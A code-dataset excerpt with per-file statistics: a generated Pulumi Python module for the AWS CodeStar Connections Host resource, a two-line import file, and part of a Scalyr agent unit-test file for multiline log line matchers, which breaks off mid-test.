from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['HostArgs', 'Host']
@pulumi.input_type
class HostArgs:
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen); the decorator /
    # property layout is the codegen contract — do not restructure by hand.
    def __init__(__self__, *,
                 provider_endpoint: pulumi.Input[str],
                 provider_type: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None,
                 vpc_configuration: Optional[pulumi.Input['HostVpcConfigurationArgs']] = None):
        """
        The set of arguments for constructing a Host resource.
        :param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
        :param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
        :param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
        :param pulumi.Input['HostVpcConfigurationArgs'] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        pulumi.set(__self__, "provider_endpoint", provider_endpoint)
        pulumi.set(__self__, "provider_type", provider_type)
        # Optional inputs are stored only when explicitly supplied, so the
        # engine can distinguish "unset" from an explicit value.
        if name is not None:
            pulumi.set(__self__, "name", name)
        if vpc_configuration is not None:
            pulumi.set(__self__, "vpc_configuration", vpc_configuration)

    @property
    @pulumi.getter(name="providerEndpoint")
    def provider_endpoint(self) -> pulumi.Input[str]:
        """
        The endpoint of the infrastructure to be represented by the host after it is created.
        """
        return pulumi.get(self, "provider_endpoint")

    @provider_endpoint.setter
    def provider_endpoint(self, value: pulumi.Input[str]):
        pulumi.set(self, "provider_endpoint", value)

    @property
    @pulumi.getter(name="providerType")
    def provider_type(self) -> pulumi.Input[str]:
        """
        The name of the external provider where your third-party code repository is configured.
        """
        return pulumi.get(self, "provider_type")

    @provider_type.setter
    def provider_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "provider_type", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the host to be created. The name must be unique in the calling AWS account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="vpcConfiguration")
    def vpc_configuration(self) -> Optional[pulumi.Input['HostVpcConfigurationArgs']]:
        """
        The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        return pulumi.get(self, "vpc_configuration")

    @vpc_configuration.setter
    def vpc_configuration(self, value: Optional[pulumi.Input['HostVpcConfigurationArgs']]):
        pulumi.set(self, "vpc_configuration", value)
@pulumi.input_type
class _HostState:
    # NOTE: generated code. Unlike HostArgs, every field here is optional
    # because state lookups may be partial.
    def __init__(__self__, *,
                 arn: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 provider_endpoint: Optional[pulumi.Input[str]] = None,
                 provider_type: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 vpc_configuration: Optional[pulumi.Input['HostVpcConfigurationArgs']] = None):
        """
        Input properties used for looking up and filtering Host resources.
        :param pulumi.Input[str] arn: The CodeStar Host ARN.
        :param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
        :param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
        :param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
        :param pulumi.Input[str] status: The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
        :param pulumi.Input['HostVpcConfigurationArgs'] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        # Each field is recorded only when explicitly provided.
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if provider_endpoint is not None:
            pulumi.set(__self__, "provider_endpoint", provider_endpoint)
        if provider_type is not None:
            pulumi.set(__self__, "provider_type", provider_type)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if vpc_configuration is not None:
            pulumi.set(__self__, "vpc_configuration", vpc_configuration)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        The CodeStar Host ARN.
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the host to be created. The name must be unique in the calling AWS account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="providerEndpoint")
    def provider_endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        The endpoint of the infrastructure to be represented by the host after it is created.
        """
        return pulumi.get(self, "provider_endpoint")

    @provider_endpoint.setter
    def provider_endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "provider_endpoint", value)

    @property
    @pulumi.getter(name="providerType")
    def provider_type(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the external provider where your third-party code repository is configured.
        """
        return pulumi.get(self, "provider_type")

    @provider_type.setter
    def provider_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "provider_type", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter(name="vpcConfiguration")
    def vpc_configuration(self) -> Optional[pulumi.Input['HostVpcConfigurationArgs']]:
        """
        The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        return pulumi.get(self, "vpc_configuration")

    @vpc_configuration.setter
    def vpc_configuration(self, value: Optional[pulumi.Input['HostVpcConfigurationArgs']]):
        pulumi.set(self, "vpc_configuration", value)
class Host(pulumi.CustomResource):
    # NOTE: generated by tfgen. The two @overload __init__ stubs exist only
    # for type checkers; the real dispatch happens in the un-decorated
    # __init__ below, which routes to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 provider_endpoint: Optional[pulumi.Input[str]] = None,
                 provider_type: Optional[pulumi.Input[str]] = None,
                 vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None,
                 __props__=None):
        """
        Provides a CodeStar Host.
        > **NOTE:** The `codestarconnections.Host` resource is created in the state `PENDING`. Authentication with the host provider must be completed in the AWS Console. For more information visit [Set up a pending host](https://docs.aws.amazon.com/dtconsole/latest/userguide/connections-host-setup.html).
        ## Example Usage
        ```python
        import pulumi
        import pulumi_aws as aws
        example = aws.codestarconnections.Host("example",
            provider_endpoint="https://example.com",
            provider_type="GitHubEnterpriseServer")
        ```
        ## Import
        CodeStar Host can be imported using the ARN, e.g.
        ```sh
        $ pulumi import aws:codestarconnections/host:Host example-host arn:aws:codestar-connections:us-west-1:0123456789:host/79d4d357-a2ee-41e4-b350-2fe39ae59448
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
        :param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
        :param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
        :param pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: HostArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a CodeStar Host.
        > **NOTE:** The `codestarconnections.Host` resource is created in the state `PENDING`. Authentication with the host provider must be completed in the AWS Console. For more information visit [Set up a pending host](https://docs.aws.amazon.com/dtconsole/latest/userguide/connections-host-setup.html).
        ## Example Usage
        ```python
        import pulumi
        import pulumi_aws as aws
        example = aws.codestarconnections.Host("example",
            provider_endpoint="https://example.com",
            provider_type="GitHubEnterpriseServer")
        ```
        ## Import
        CodeStar Host can be imported using the ARN, e.g.
        ```sh
        $ pulumi import aws:codestarconnections/host:Host example-host arn:aws:codestar-connections:us-west-1:0123456789:host/79d4d357-a2ee-41e4-b350-2fe39ae59448
        ```
        :param str resource_name: The name of the resource.
        :param HostArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Decide which overload the caller used (positional HostArgs vs.
        # keyword properties) and forward to _internal_init either way.
        resource_args, opts = _utilities.get_resource_args_opts(HostArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       provider_endpoint: Optional[pulumi.Input[str]] = None,
                       provider_type: Optional[pulumi.Input[str]] = None,
                       vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None,
                       __props__=None):
        # Shared implementation behind both public __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: validate required inputs and build the
            # property bag. Required checks are skipped when opts.urn is set
            # (the engine is rehydrating an existing resource).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = HostArgs.__new__(HostArgs)
            __props__.__dict__["name"] = name
            if provider_endpoint is None and not opts.urn:
                raise TypeError("Missing required property 'provider_endpoint'")
            __props__.__dict__["provider_endpoint"] = provider_endpoint
            if provider_type is None and not opts.urn:
                raise TypeError("Missing required property 'provider_type'")
            __props__.__dict__["provider_type"] = provider_type
            __props__.__dict__["vpc_configuration"] = vpc_configuration
            # Output-only properties start as None and are filled by the engine.
            __props__.__dict__["arn"] = None
            __props__.__dict__["status"] = None
        super(Host, __self__).__init__(
            'aws:codestarconnections/host:Host',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            arn: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            provider_endpoint: Optional[pulumi.Input[str]] = None,
            provider_type: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None,
            vpc_configuration: Optional[pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']]] = None) -> 'Host':
        """
        Get an existing Host resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] arn: The CodeStar Host ARN.
        :param pulumi.Input[str] name: The name of the host to be created. The name must be unique in the calling AWS account.
        :param pulumi.Input[str] provider_endpoint: The endpoint of the infrastructure to be represented by the host after it is created.
        :param pulumi.Input[str] provider_type: The name of the external provider where your third-party code repository is configured.
        :param pulumi.Input[str] status: The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
        :param pulumi.Input[pulumi.InputType['HostVpcConfigurationArgs']] vpc_configuration: The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        # Merging id into opts is what tells the engine to look up an existing
        # resource instead of creating one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _HostState.__new__(_HostState)
        __props__.__dict__["arn"] = arn
        __props__.__dict__["name"] = name
        __props__.__dict__["provider_endpoint"] = provider_endpoint
        __props__.__dict__["provider_type"] = provider_type
        __props__.__dict__["status"] = status
        __props__.__dict__["vpc_configuration"] = vpc_configuration
        return Host(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def arn(self) -> pulumi.Output[str]:
        """
        The CodeStar Host ARN.
        """
        return pulumi.get(self, "arn")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the host to be created. The name must be unique in the calling AWS account.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="providerEndpoint")
    def provider_endpoint(self) -> pulumi.Output[str]:
        """
        The endpoint of the infrastructure to be represented by the host after it is created.
        """
        return pulumi.get(self, "provider_endpoint")

    @property
    @pulumi.getter(name="providerType")
    def provider_type(self) -> pulumi.Output[str]:
        """
        The name of the external provider where your third-party code repository is configured.
        """
        return pulumi.get(self, "provider_type")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        The CodeStar Host status. Possible values are `PENDING`, `AVAILABLE`, `VPC_CONFIG_DELETING`, `VPC_CONFIG_INITIALIZING`, and `VPC_CONFIG_FAILED_INITIALIZATION`.
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter(name="vpcConfiguration")
    def vpc_configuration(self) -> pulumi.Output[Optional['outputs.HostVpcConfiguration']]:
        """
        The VPC configuration to be provisioned for the host. A VPC must be configured, and the infrastructure to be represented by the host must already be connected to the VPC.
        """
        return pulumi.get(self, "vpc_configuration")
| 46.043478
| 306
| 0.663889
| 2,156
| 18,003
| 5.352968
| 0.09462
| 0.064812
| 0.064293
| 0.055281
| 0.852006
| 0.835803
| 0.805043
| 0.789013
| 0.756694
| 0.739537
| 0
| 0.004756
| 0.240793
| 18,003
| 390
| 307
| 46.161538
| 0.839625
| 0.396156
| 0
| 0.620853
| 1
| 0
| 0.118956
| 0.027901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156398
| false
| 0.004739
| 0.033175
| 0
| 0.28436
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68571c2636ced4e851e074b23a5a2e8c9762dbe0
| 37
|
py
|
Python
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 1
|
2019-12-13T12:20:40.000Z
|
2019-12-13T12:20:40.000Z
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 6
|
2021-02-08T20:34:04.000Z
|
2022-03-11T23:56:28.000Z
|
app/auth/views.py
|
derriqo/Housemngr
|
a58a3cb26c1149235eba1e641e7974b9091bc86b
|
[
"MIT"
] | 6
|
2019-02-19T09:03:28.000Z
|
2019-02-21T06:38:35.000Z
|
from . import auth
from .. import db
| 12.333333
| 18
| 0.702703
| 6
| 37
| 4.333333
| 0.666667
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 37
| 2
| 19
| 18.5
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
68a428800dfe0506cd4ace79a036d879b347b3a3
| 29,910
|
py
|
Python
|
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
scalyr_agent/tests/line_matcher_test.py
|
echee2/scalyr-agent-2
|
da7d168260b94dc95aedb5ae0dca03165e55cb02
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Imron Alston <imron@scalyr.com>
__author__ = 'imron@scalyr.com'
import time
import unittest
import pdb
from cStringIO import StringIO
from scalyr_agent.line_matcher import LineMatcher
from scalyr_agent.line_matcher import LineMatcherCollection
from scalyr_agent.line_matcher import ContinueThrough
from scalyr_agent.line_matcher import ContinuePast
from scalyr_agent.line_matcher import HaltBefore
from scalyr_agent.line_matcher import HaltWith
def make_string(string):
    """Return a writable file-like object holding *string*, rewound to offset 0."""
    buf = StringIO()
    buf.write(string)
    buf.seek(0)
    return buf
def append_string(line, string):
    """Append *string* to the end of *line*, preserving the current read offset."""
    saved_offset = line.tell()
    line.seek(0, 2)  # jump to EOF before writing
    line.write(string)
    line.seek(saved_offset)
    return line
class SingleLineMatcherTestCase(unittest.TestCase):
    """Behaviour of the base LineMatcher, which emits one full line at a time."""

    def test_single_line(self):
        # A newline-terminated line is returned immediately and in full.
        expected = "Hello World\n"
        buf = make_string(expected)
        matcher = LineMatcher()
        self.assertEqual(expected, matcher.readline(buf, time.time()))

    def test_single_line_partial(self):
        # Nothing is emitted until the terminating newline arrives.
        expected = "Hello World"
        buf = make_string(expected)
        matcher = LineMatcher()
        self.assertEqual('', matcher.readline(buf, time.time()))
        buf = append_string(buf, "\n")
        self.assertEqual(expected + "\n", matcher.readline(buf, time.time()))

    def test_single_line_partial_timeout(self):
        # A partial line is flushed once line_completion_wait_time has elapsed.
        expected = "Hello World"
        buf = make_string(expected)
        matcher = LineMatcher(line_completion_wait_time=5)
        self.assertEqual('', matcher.readline(buf, time.time() - 6))
        self.assertEqual(expected, matcher.readline(buf, time.time()))

    def test_single_line_partial_too_long(self):
        # Input longer than max_line_length is cut off at the limit.
        expected = "Hello World"
        buf = make_string(expected + " How are you today")
        matcher = LineMatcher(max_line_length=11)
        self.assertEqual(expected, matcher.readline(buf, time.time()))
class ContinueThroughTestCase(unittest.TestCase):
    """Tests for ContinueThrough: a line starting the pattern absorbs every
    following line that matches the continuation pattern (java-stacktrace style)."""

    def setUp(self):
        # Start: any line NOT beginning with whitespace.
        # Continuation: whitespace followed by "at" (stack-frame lines).
        self.start_pattern = "^[^\\s]"
        self.continuation_pattern = "^[\\s]+at"

    def test_continue_through(self):
        # The whole stack trace is emitted as one line; the following
        # unrelated line is left in the buffer.
        expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n at com.foo.baz(baz.java:123)\n"
        expected_next = "next line\n"
        line = make_string(expected + expected_next)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)

    def test_first_line_match_second_line_no_match(self):
        # A start line whose successor does not continue is held back
        # ('' returned); the raw line is still unconsumed in the buffer.
        expected = "java.lang.Exception\n"
        expected_next = "haha Not a java.lang.Exception\n"
        line = make_string(expected + expected_next)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected, actual)

    def test_partial_first_line_match(self):
        # A start line alone yields nothing; once a continuation and a
        # non-matching line arrive, start + continuation are emitted together.
        expected = "java.lang.Exception\n"
        expected_next = " at com.foo.bar(bar.java:123)\n"
        expected_last = "Another line\n"
        line = make_string(expected)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        line = append_string(line, expected_next + expected_last)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected + expected_next, actual)
        actual = line.readline()
        self.assertEqual(expected_last, actual)

    def test_partial_multiline_match(self):
        # A multiline match is withheld until a non-continuation line closes it.
        expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n at com.foo.baz(baz.java:456)\n"
        expected_last = "Another line\n"
        line = make_string(expected)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        line = append_string(line, expected_last)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual(expected_last, actual)

    def test_no_match(self):
        # Lines that never match the start pattern produce no output.
        line1 = " starts with a space\n"
        line2 = " also starts with a space\n"
        line = make_string(line1 + line2)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(line1, actual)

    def test_timeout_after_matching_start(self):
        # A lone start line is flushed after line_completion_wait_time.
        expected = "java.lang.Exception\n"
        line = make_string(expected)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern, line_completion_wait_time=5)
        current_time = time.time()
        actual = matcher.readline(line, current_time - 6)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        expected_next = " starts with a space\n"
        line = append_string(line, expected_next)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)

    def test_timeout_after_matching_continue(self):
        # Start + continuation also flush together on timeout.
        expected = "java.lang.Exception\n at com.foo.bar(bar.java:123)\n"
        line = make_string(expected)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern, line_completion_wait_time=5)
        current_time = time.time()
        actual = matcher.readline(line, current_time - 6)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        expected_next = " starts with a space\n"
        line = append_string(line, expected_next)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)

    def test_too_long_matching_start(self):
        # max_line_length truncates even the start line.
        expected = "java.lang."
        line = make_string(expected + "Exception\n")
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern, max_line_length=10)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual("Exception\n", actual)

    def test_too_long_after_matching_continue(self):
        # Truncation may land in the middle of a continuation line; the
        # remainder stays in the buffer.
        expected = "java.lang.Exception\n at com"
        remainder = ".foo.baz(baz.java:123)\n"
        line = make_string(expected + remainder)
        matcher = ContinueThrough(self.start_pattern, self.continuation_pattern, max_line_length=30)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual(remainder, actual)
class ContinuePastTestCase(unittest.TestCase):
    """Tests for ContinuePast: a trailing backslash means "the next line is
    part of this one"; the match extends one line PAST the last match."""

    def setUp(self):
        # Both patterns: line ends with a backslash (shell-style continuation).
        self.start_pattern = r"\\$"
        self.continuation_pattern = r"\\$"

    def test_continue_past(self):
        # Backslash-continued lines plus the terminating line come out as one.
        expected = "This is a multiline \\\nstring with each line\\\nseparated by backslashes\n"
        expected_next = "next line\n"
        line = make_string(expected + expected_next)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)

    def test_first_line_match_second_line_no_match(self):
        # The line after the last continuation is included; the one after
        # that is untouched.
        expected = "multiline string \\\nthat ends here\n"
        expected_next = "single line string\n"
        line = make_string(expected + expected_next)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)

    def test_partial_first_line_match(self):
        # A continued line alone yields nothing until its terminator arrives.
        expected = "start of a multiline\\\n"
        expected_next = "last line\n"
        expected_last = "Another line\n"
        line = make_string(expected)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        line = append_string(line, expected_next + expected_last)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected + expected_next, actual)
        actual = line.readline()
        self.assertEqual(expected_last, actual)

    def test_partial_multiline_match(self):
        # Every pending continuation plus the appended terminator is emitted,
        # leaving the buffer empty.
        expected = "start of a multiline line\\\ncontinuation of a multiline line\\\nstill continuing\\\n"
        expected_last = "Another line\n"
        line = make_string(expected)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        line = append_string(line, expected_last)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected + expected_last, actual)
        actual = line.readline()
        self.assertEqual('', actual)

    def test_no_match(self):
        # Plain lines never match, so nothing is emitted and the buffer keeps them.
        line1 = "single line\n"
        line2 = "another single line\n"
        line = make_string(line1 + line2)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(line1, actual)

    def test_timeout_after_matching_start(self):
        # An unterminated continuation is flushed after line_completion_wait_time.
        expected = "start of a multiline\\\n"
        line = make_string(expected)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern, line_completion_wait_time=5)
        current_time = time.time()
        actual = matcher.readline(line, current_time - 6)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual('', actual)

    def test_timeout_after_matching_continue(self):
        # Multiple pending continuations also flush together on timeout.
        expected = "start of a multiline\\\ncontinuation of a multiline\\\n"
        line = make_string(expected)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern, line_completion_wait_time=5)
        current_time = time.time()
        actual = matcher.readline(line, current_time - 6)
        self.assertEqual('', actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual('', actual)

    def test_too_long_matching_start(self):
        # max_line_length truncates the first line; the rest stays buffered.
        expected = "start of a"
        line = make_string(expected + " multiline\\\n")
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern, max_line_length=10)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual(" multiline\\\n", actual)

    def test_too_long_after_matching_continue(self):
        # Truncation mid-terminator: the cut-off remainder stays in the buffer.
        expected = "start of a multiline\\\ncontinuing\\\nthis line "
        remainder = "will be cut\n"
        line = make_string(expected + remainder)
        matcher = ContinuePast(self.start_pattern, self.continuation_pattern, max_line_length=44)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = line.readline()
        self.assertEqual(remainder, actual)
class HaltBeforeTestCase( unittest.TestCase ):
    def setUp(self):
        # Both patterns match a literal "--begin" record delimiter at line start.
        self.start_pattern = r"^--begin"
        self.continuation_pattern = r"^--begin"
    def test_halt_before(self):
        # A message runs up to (but not including) the next "--begin";
        # the trailing delimiter is left unconsumed in the buffer.
        expected = "--begin\nThis is a multiline message\nThat will end when the\nnext one starts\n"
        expected_next = "--begin\n"
        line = make_string(expected + expected_next)
        matcher = HaltBefore(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
        actual = line.readline()
        self.assertEqual(expected_next, actual)
    def test_first_line_match_second_line_no_match(self):
        # Two back-to-back delimiters: the first is emitted alone, the second
        # is withheld (its own message has not completed yet).
        expected = "--begin\n"
        expected_next = "--begin\n"
        line = make_string(expected + expected_next)
        matcher = HaltBefore(self.start_pattern, self.continuation_pattern)
        current_time = time.time()
        actual = matcher.readline(line, current_time)
        self.assertEqual(expected, actual)
        actual = matcher.readline(line, current_time)
        self.assertEqual('', actual)
def test_partial_first_line_match( self ):
expected = "--begin\n"
expected_next = "last line\n"
expected_last = "--begin\n"
line = make_string( expected )
